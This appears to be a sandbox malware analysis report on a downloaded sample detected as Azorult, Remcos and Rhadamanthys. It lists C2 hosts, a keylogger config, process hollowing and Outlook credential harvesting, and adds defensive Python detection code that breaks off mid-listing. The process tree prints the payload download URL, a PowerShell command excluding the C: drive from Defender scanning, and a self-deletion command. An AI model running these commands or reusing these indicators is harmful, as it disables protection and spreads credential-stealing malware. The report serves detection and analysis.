Analysis
max time kernel: 150s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20-03-2023 15:06
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: http://cointra.ac.ug/ghjk.exe
Resource: win10v2004-20230220-en
General
Target: http://cointra.ac.ug/ghjk.exe
Malware Config
Extracted: azorult
C2 URL: http://195.245.112.115/index.php
Extracted: remcos
Botnet ID: 03162023
C2 hosts:
- nikahuve.ac.ug:65213
- kalskala.ac.ug:65213
- tuekisaa.ac.ug:65213
- parthaha.ac.ug:65213
Configuration:
audio_folder: MicRecords
audio_path: %AppData%
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: revcs.exe
copy_folder: sdf
delete_file: true
hide_file: true
hide_keylog_file: true
install_flag: false
install_path: %AppData%
keylog_crypt: true
keylog_file: vgcqfxs.dat
keylog_flag: false
keylog_folder: fsscbas
keylog_path: %AppData%
mouse_option: false
mutex: fdvcmhjdf-Z4BK1G
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
startup_value: Remvc
take_screenshot_option: false
take_screenshot_time: 5
take_screenshot_title: notepad;solitaire;
Reading the Remcos config: the mutex fdvcmhjdf-Z4BK1G and the four C2 hosts on port 65213 (all in the same .ac.ug namespace as the download host) are the dependable indicators from this build. install_flag and keylog_flag are both false, so the install copy (%AppData%\sdf\revcs.exe), the Run value Remvc and the encrypted keylog file (%AppData%\fsscbas\vgcqfxs.dat) are only created if the operator turns those features on; their absence on a host does not show the RAT never ran.
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Detect rhadamanthys stealer shellcode 5 IoCs
YARA rule family_rhadamanthys matched in memory dumps of ghjk.exe (PID 4440), the child copy that ghjk.exe (PID 3580) wrote into and set the thread context of (see SetThreadContext below):
- behavioral1/memory/4440-196-0x00000000010F0000-0x000000000110C000-memory.dmp
- behavioral1/memory/4440-198-0x00000000010F0000-0x000000000110C000-memory.dmp
- behavioral1/memory/4440-200-0x0000000002E40000-0x0000000003E40000-memory.dmp
- behavioral1/memory/4440-201-0x00000000010F0000-0x000000000110C000-memory.dmp
- behavioral1/memory/4440-208-0x00000000010F0000-0x000000000110C000-memory.dmp
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up the country code configured in the registry, likely a geofence (the sample can refuse to run in chosen locales).
Key value queried: \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation
Processes: ghjk.exe, CE7B.tmp.exe (twice), D89F.tmp.exe, D449.tmp.exe
-
Executes dropped EXE 10 IoCs
Processes (PID, image):
- 3580 ghjk.exe
- 4440 ghjk.exe
- 1376 CE7B.tmp.exe
- 3968 D449.tmp.exe
- 2848 CE7B.tmp.exe
- 3644 D89F.tmp.exe
- 1880 D449.tmp.exe
- 4672 D449.tmp.exe
- 220 D449.tmp.exe
- 4472 D89F.tmp.exe
-
Loads dropped DLL 4 IoCs
Process: CE7B.tmp.exe (PID 2848), four load events. The four DLLs dropped to C:\Users\Admin\AppData\Local\Temp\B2503312\ (mozglue.dll, msvcp140.dll, nss3.dll, vcruntime140.dll; see Downloads) are the likely candidates: nss3.dll and mozglue.dll are Mozilla's NSS libraries, which stealers carry along so they can decrypt Firefox saved logins without depending on the installed browser, and the two VC++ runtime DLLs are what NSS needs to load.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Process: dllhost.exe (PID 3932). It was spawned by ghjk.exe (PID 4440) and written to by it four times (see WriteProcessMemory), so treat this as injected code harvesting mail profiles, not as normal COM surrogate activity. Keys opened under \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000:
- Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
- Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
- Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook
- Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook
- Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook
-
Adds Run key to start application 2 TTPs 1 IoCs
Process: D89F.tmp.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Picxpsdvu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Omsae\\Picxpsdvu.exe\""
This HKCU Run value (Picxpsdvu, pointing into %AppData%\Omsae\) does not match the extracted Remcos config (install_flag false, startup_value Remvc), so it is not the Remcos installer path configured above; the value name and the folder are both host IOCs in their own right.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Process: ghjk.exe (PID 4440), three calls. ThreadHideFromDebugger stops the thread from delivering debug events to an attached debugger, a common anti-debugging step taken by an unpacked payload before its real work starts.
-
Suspicious use of SetThreadContext 5 IoCs
Each dropper sets the thread context of a freshly spawned copy of itself, the pattern process hollowing leaves behind (create the child suspended, overwrite its image with WriteProcessMemory, point the main thread at the new entry with SetThreadContext, resume). Parent -> target:
- PID 3580 ghjk.exe -> PID 4440 ghjk.exe
- PID 1376 CE7B.tmp.exe -> PID 2848 CE7B.tmp.exe
- PID 3968 D449.tmp.exe -> PID 1880 D449.tmp.exe
- PID 4672 D449.tmp.exe -> PID 220 D449.tmp.exe
- PID 3644 D89F.tmp.exe -> PID 4472 D89F.tmp.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature is "likely ransomware behaviour", but nothing else in this run supports that reading (no file encryption or ransom note is recorded, and the detections are Azorult, Remcos and Rhadamanthys); read it here as drive enumeration by a stealer looking for files to collect.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments (virtual CPUs expose tell-tale ProcessorNameString values).
Processes: dllhost.exe and CE7B.tmp.exe each opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 and queried its ProcessorNameString value.
-
Delays execution with timeout.exe 1 IoCs
Process: timeout.exe (PID 336), launched from cmd.exe as "timeout.exe 3 & del CE7B.tmp.exe" (see the process tree): a three-second pause before the dropper's own file is deleted.
-
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
Process: iexplore.exe, the browser used to fetch the sample. This and the settings block below are browser housekeeping caused by opening the download URL, not malware activity.
- Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Internet Explorer\PhishingFilter
- Set value (data) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 575ec7859e45d901
-
Modifies Internet Explorer settings 36 IoCs
Processes: iexplore.exe (PID 4208) and IEXPLORE.EXE (PID 2808). HKU below stands for \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000; the two DecayDateQueue values are DPAPI blobs (they begin with the DPAPI header 01000000d08c9ddf0115d1118c7a00c04fc297eb).
- Key created HKU\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{22AE3A8E-C739-11ED-B7D7-D660CAC54930} = "0" (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\VersionManager (iexplore.exe)
- Key created HKU\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\Recovery\AdminActive (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31021893" (iexplore.exe)
- Set value (data) HKU\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\RepId (iexplore.exe)
- Set value (str) HKU\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{46D2B7B6-D3AE-4B80-971F-D34D074EDEE1}" (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\Main (iexplore.exe)
- Set value (str) HKU\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\TabbedBrowsing (iexplore.exe)
- Key created HKU\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage (iexplore.exe)
- Set value (data) HKU\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c884d0db6b01394f84d012a5eedc1d2d0000000002000000000010660000000100002000000096693716ca883e4f77bd43988dcc8905a50bae4a79d32cf29e091e7f87007f7d000000000e80000000020000200000005787eab927c912eabe52e11471079990f4477f40533500950c881920b7f537d820000000183a21c73461d29857e64227568618e8486f795489db24550194a9507849068240000000f8189ab10c5960605ffa51c02ae1541686253db5618cbe96ff0f59cdd55b67562a59540ee9103bb9809d43296974400dc62a1404cd8381b4b81e49ad670f48cc (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "386093349" (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31021893" (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4154176178" (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\DomainSuggestion (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" (iexplore.exe)
- Set value (data) HKU\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c884d0db6b01394f84d012a5eedc1d2d000000000200000000001066000000010000200000009663606e205f85711b1ad0e2d380f983451f99f297095af23f41f5d6f0d799a3000000000e8000000002000020000000ca7292f537b2cfa1fbf3018e66a469963bb753aab6d9cdfc5dccb9885b57e454200000002ecd5a225d5622435681efc28d01d95f97514fc49aeaec51553866ea4d67393940000000550c8e9ee92c3f5037ed4c87489371fbcf8f9f03d8d3bb59b5166846ce54387831234818f2804a8dcb4f82a3c0ed25d8a97b39053efa01edbc7456c3d1c0a126 (iexplore.exe)
- Set value (str) HKU\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\MINIE (iexplore.exe)
- Set value (data) HKU\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 409074f8455bd901 (iexplore.exe)
- Key created HKU\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\Main (IEXPLORE.EXE)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4154176178" (iexplore.exe)
- Set value (int) HKU\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" (iexplore.exe)
- Set value (data) HKU\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f08993f8455bd901 (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ (iexplore.exe)
- Key created HKU\Software\Microsoft\Internet Explorer\Main\WindowsSearch (iexplore.exe)
- Set value (str) HKU\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" (iexplore.exe)
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes (PID, image, event count):
- 2316 powershell.exe (3)
- 4440 ghjk.exe (2)
- 3932 dllhost.exe (4)
- 2108 powershell.exe (2)
- 2848 CE7B.tmp.exe (2)
- 2336 powershell.exe (2)
- 3940 powershell.exe (2)
- 220 D449.tmp.exe (7)
-
Suspicious use of AdjustPrivilegeToken 11 IoCs
Token: SeDebugPrivilege enabled by (PID, image):
- 2316 powershell.exe
- 3580 ghjk.exe
- 1376 CE7B.tmp.exe
- 3968 D449.tmp.exe
- 2108 powershell.exe
- 1880 D449.tmp.exe
- 2336 powershell.exe
- 4672 D449.tmp.exe
- 3644 D89F.tmp.exe
- 3940 powershell.exe
- 220 D449.tmp.exe
powershell.exe routinely shows this in sandbox runs; the entries worth noting are the droppers, each of which enables the privilege shortly before opening and writing another process.
-
Suspicious use of FindShellTrayWindow 2 IoCs
Process: iexplore.exe (PID 4208), two calls (normal browser UI behaviour).
-
Suspicious use of SetWindowsHookEx 5 IoCs
Processes: iexplore.exe (PID 4208, 2 calls), IEXPLORE.EXE (PID 2808, 2 calls), D89F.tmp.exe (PID 4472, 1 call). The browser hooks are normal; the hook installed by the D89F.tmp.exe child, the copy its parent set the thread context of, is how user-mode keyloggers typically capture input.
-
Suspicious use of WriteProcessMemory 64 IoCs
Parent -> target (number of write events):
- 4208 iexplore.exe -> 2808 IEXPLORE.EXE (3)
- 4208 iexplore.exe -> 3580 ghjk.exe (3)
- 3580 ghjk.exe -> 2316 powershell.exe (3)
- 3580 ghjk.exe -> 4440 ghjk.exe (9)
- 4440 ghjk.exe -> 3932 dllhost.exe (4)
- 1376 CE7B.tmp.exe -> 2848 CE7B.tmp.exe (9)
- 3644 D89F.tmp.exe -> 2108 powershell.exe (3)
- 3968 D449.tmp.exe -> 1880 D449.tmp.exe (6)
- 2848 CE7B.tmp.exe -> 1808 cmd.exe (3)
- 1808 cmd.exe -> 336 timeout.exe (3)
- 1880 D449.tmp.exe -> 2336 powershell.exe (2)
- 4672 D449.tmp.exe -> 220 D449.tmp.exe (6)
- 3644 D89F.tmp.exe -> 4484 cmd.exe (3)
- 4484 cmd.exe -> 3940 powershell.exe (3)
- 3644 D89F.tmp.exe -> 4472 D89F.tmp.exe (4)
A few writes from a parent into a child it has just created are normal: process creation itself writes the child's start-up data, which is why iexplore.exe and cmd.exe appear here. The pairs that matter are the five same-image pairs that also appear under SetThreadContext, and the four writes from ghjk.exe (PID 4440) into dllhost.exe (PID 3932), which receives no SetThreadContext but goes on to read Outlook profiles and CPU information.
-
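Added example (not part of the sandbox report): the SetThreadContext and WriteProcessMemory tables above are the raw material for telling process hollowing apart from the ordinary writes a parent makes into a child it launches. The Python below parses event lines in the report's own wording, aggregates them per parent/child pair and applies two rules: writes plus SetThreadContext into a same-named child is hollowing, and writes into a known host binary such as dllhost.exe, even without SetThreadContext, is suspected injection. The event lines are copied from this report (a subset, with repeats expanded to their recorded counts); the host-binary list and the verdict wording are our own assumptions, not something the report states.

```python
import re

# Constructed sample: a subset of the "SetThreadContext" and "WriteProcessMemory"
# events from the report, repeated writes multiplied out to their recorded counts.
SAMPLE_EVENTS = (
    "PID 3580 set thread context of 4440 3580 ghjk.exe ghjk.exe\n"
    "PID 1376 set thread context of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe\n"
    "PID 3968 set thread context of 1880 3968 D449.tmp.exe D449.tmp.exe\n"
    "PID 4672 set thread context of 220 4672 D449.tmp.exe D449.tmp.exe\n"
    "PID 3644 set thread context of 4472 3644 D89F.tmp.exe D89F.tmp.exe\n"
    + "PID 4208 wrote to memory of 2808 4208 iexplore.exe IEXPLORE.EXE\n" * 3
    + "PID 4208 wrote to memory of 3580 4208 iexplore.exe ghjk.exe\n" * 3
    + "PID 3580 wrote to memory of 4440 3580 ghjk.exe ghjk.exe\n" * 9
    + "PID 4440 wrote to memory of 3932 4440 ghjk.exe dllhost.exe\n" * 4
    + "PID 1376 wrote to memory of 2848 1376 CE7B.tmp.exe CE7B.tmp.exe\n" * 9
    + "PID 3968 wrote to memory of 1880 3968 D449.tmp.exe D449.tmp.exe\n" * 6
    + "PID 4672 wrote to memory of 220 4672 D449.tmp.exe D449.tmp.exe\n" * 6
    + "PID 3644 wrote to memory of 4472 3644 D89F.tmp.exe D89F.tmp.exe\n" * 4
    + "PID 2848 wrote to memory of 1808 2848 CE7B.tmp.exe cmd.exe\n" * 3
)

# One event line in the report's wording: "PID <parent> <action> <child> <parent> <pimg> <cimg>"
EVENT_RE = re.compile(
    r"^PID (?P<parent>\d+) (?P<action>set thread context of|wrote to memory of) "
    r"(?P<child>\d+) (?P=parent) (?P<parent_image>\S+) (?P<child_image>\S+)$"
)

# Legitimate Windows binaries that are popular injection/hollowing hosts.
# Heuristic list (our assumption), not something the report states.
HOST_BINARIES = {"dllhost.exe", "svchost.exe", "regasm.exe", "regsvcs.exe",
                 "msbuild.exe", "installutil.exe", "aspnet_compiler.exe"}


def parse_events(text: str) -> dict:
    """Aggregate per (parent PID, child PID): write count and whether SetThreadContext was seen."""
    pairs = {}
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue  # not an event line; ignore headers and other text
        key = (int(m["parent"]), int(m["child"]))
        rec = pairs.setdefault(key, {
            "parent_image": m["parent_image"], "child_image": m["child_image"],
            "writes": 0, "set_context": False,
        })
        if m["action"].startswith("wrote"):
            rec["writes"] += 1
        else:
            rec["set_context"] = True
    return pairs


def classify(pairs: dict) -> list:
    """WriteProcessMemory alone is normal for a parent launching a child (iexplore.exe ->
    IEXPLORE.EXE); the combination with SetThreadContext, or writes into a system host
    binary, is what marks injection."""
    findings = []
    for (parent, child), rec in sorted(pairs.items()):
        same_image = rec["parent_image"].lower() == rec["child_image"].lower()
        if rec["set_context"] and rec["writes"]:
            verdict = ("process hollowing (self-replica)" if same_image
                       else "remote injection via SetThreadContext")
        elif rec["writes"] and rec["child_image"].lower() in HOST_BINARIES:
            verdict = "suspected injection into system host binary"
        else:
            continue
        findings.append({"parent": parent, "child": child,
                         "parent_image": rec["parent_image"], "child_image": rec["child_image"],
                         "writes": rec["writes"], "verdict": verdict})
    return findings


def suspicious_pairs(text: str) -> list:
    return classify(parse_events(text))


if __name__ == "__main__":
    for f in suspicious_pairs(SAMPLE_EVENTS):
        print(f"{f['parent_image']}({f['parent']}) -> {f['child_image']}({f['child']}): "
              f"{f['writes']} writes, {f['verdict']}")
```

Run against the sample it reports six pairs: the five hollowing pairs from the SetThreadContext table and ghjk.exe (4440) -> dllhost.exe (3932); the browser and cmd.exe pairs are left alone. The second rule is deliberately weaker than the first (no SetThreadContext is required), because injection into a host binary can use thread-creation or section-mapping APIs that a sandbox may not tag; tune HOST_BINARIES to what your environment actually runs.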
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
Process: dllhost.exe. Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
-
outlook_win_path 1 IoCs
Process: dllhost.exe. Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Processes
Indentation reproduces the depth markers of the original tree; PIDs are taken from the signature tables above. CE7B.tmp.exe, D449.tmp.exe and D89F.tmp.exe appear as separate roots because the sandbox did not record which process launched them. Where a powershell.exe or cmd.exe image sits under SysWOW64 although the command line names System32, the process is a 32-bit instance reached through WOW64 file-system redirection from a 32-bit parent. The -ENC payloads are base64 of UTF-16LE text; their decoded values are given inline.

- iexplore.exe (PID 4208)
  Image: C:\Program Files\Internet Explorer\iexplore.exe
  Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://cointra.ac.ug/ghjk.exe
  Signatures: Modifies Internet Explorer Phishing Filter; Modifies Internet Explorer settings; Suspicious use of FindShellTrayWindow; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - IEXPLORE.EXE (PID 2808)
    Image: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4208 CREDAT:17410 /prefetch:2
    Signatures: Modifies Internet Explorer settings; Suspicious use of SetWindowsHookEx
  - ghjk.exe (PID 3580)
    Image: C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exe
    Command line: "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exe"
    Signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - powershell.exe (PID 2316)
      Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
      Decoded -ENC payload: start-sleep -seconds 20
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - ghjk.exe (PID 4440)
      Image: C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exe
      Command line: C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0P80TOLA\ghjk.exe
      Signatures: Executes dropped EXE; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
      - dllhost.exe (PID 3932)
        Image: C:\Windows\system32\dllhost.exe
        Command line: "C:\Windows\system32\dllhost.exe"
        Signatures: Accesses Microsoft Outlook profiles; Checks processor information in registry; Suspicious behavior: EnumeratesProcesses; outlook_office_path; outlook_win_path
- CE7B.tmp.exe (PID 1376)
  Image: C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exe"
  Signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - CE7B.tmp.exe (PID 2848)
    Image: C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\CE7B.tmp.exe
    Signatures: Checks computer location settings; Executes dropped EXE; Loads dropped DLL; Checks processor information in registry; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    - cmd.exe (PID 1808)
      Image: C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "CE7B.tmp.exe"
      Signatures: Suspicious use of WriteProcessMemory
      - timeout.exe (PID 336)
        Image: C:\Windows\SysWOW64\timeout.exe
        Command line: C:\Windows\system32\timeout.exe 3
        Signatures: Delays execution with timeout.exe
- D449.tmp.exe (PID 3968)
  Image: C:\Users\Admin\AppData\Local\Temp\D449.tmp.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\D449.tmp.exe"
  Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - D449.tmp.exe (PID 1880)
    Image: C:\Users\Admin\AppData\Local\Temp\D449.tmp.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\D449.tmp.exe
    Signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - powershell.exe (PID 2336)
      Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 3; Set-MpPreference -ExclusionPath C:\
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- D89F.tmp.exe (PID 3644)
  Image: C:\Users\Admin\AppData\Local\Temp\D89F.tmp.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\D89F.tmp.exe"
  Signatures: Checks computer location settings; Executes dropped EXE; Adds Run key to start application; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - powershell.exe (PID 2108)
    Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
    Decoded -ENC payload: start-sleep -seconds 20
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - cmd.exe (PID 4484)
    Image: C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
    Decoded -ENC payload: set-mppreference -exclusionpath C:\
    Signatures: Suspicious use of WriteProcessMemory
    - powershell.exe (PID 3940)
      Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - D89F.tmp.exe (PID 4472)
    Image: C:\Users\Admin\AppData\Local\Temp\D89F.tmp.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\D89F.tmp.exe
    Signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx
- D449.tmp.exe (PID 4672)
  Image: C:\Users\Admin\AppData\Roaming\D449.tmp.exe
  Command line: C:\Users\Admin\AppData\Roaming\D449.tmp.exe
  Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - D449.tmp.exe (PID 220)
    Image: C:\Users\Admin\AppData\Roaming\D449.tmp.exe
    Command line: C:\Users\Admin\AppData\Roaming\D449.tmp.exe
    Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

Two things in the tree deserve a note. Set-MpPreference -ExclusionPath C:\ excludes the entire system drive from Defender scanning and is issued twice, once in the clear by the D449.tmp.exe chain and once base64-encoded through cmd.exe by the D89F.tmp.exe chain; the cmdlet needs administrative rights, and the report does not show whether either call succeeded. The two twenty-second start-sleep commands and the "timeout 3 & del" are the only delays in the run; the latter removes CE7B.tmp.exe from disk after its hollowed child has taken over.
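As an added example that is not part of the sandbox report, here is a small Python triage routine for the interpreter command lines in the tree above. It decodes powershell -ENC payloads (base64 of UTF-16LE, accepting the short forms -e, -ec, -enc that powershell.exe allows), strips the interpreter token from plain command lines, and then flags the three behaviours this tree shows: Defender exclusions via Set-MpPreference, long sleeps, and deleting an executable after a timeout. The four command lines are copied from the report; the rule names, the regexes and the 10-second delay threshold are our own choices.

```python
import base64
import re

# Constructed sample: the four interpreter command lines from the report's
# process tree, copied verbatim (the grouping into a list is ours).
SAMPLE_CMDLINES = [
    "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ENC "
    "cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==",
    "\"C:\\Windows\\System32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"CE7B.tmp.exe\"",
    "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" "
    "Start-Sleep -Seconds 3; Set-MpPreference -ExclusionPath C:\\",
    "powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_PREFIXES = ["encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)]
ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:%s)\s+([A-Za-z0-9+/=]+)" % "|".join(_ENC_PREFIXES))

# First token (quoted or bare interpreter path), plus cmd.exe's /c or /k switch.
LAUNCHER_RE = re.compile(r'(?i)^\s*(?:"[^"]*"|\S+)\s*(?:/[ck]\s+)?')

# Behaviours to flag. Rule names and the delay threshold are our choices (assumptions).
RULES = [
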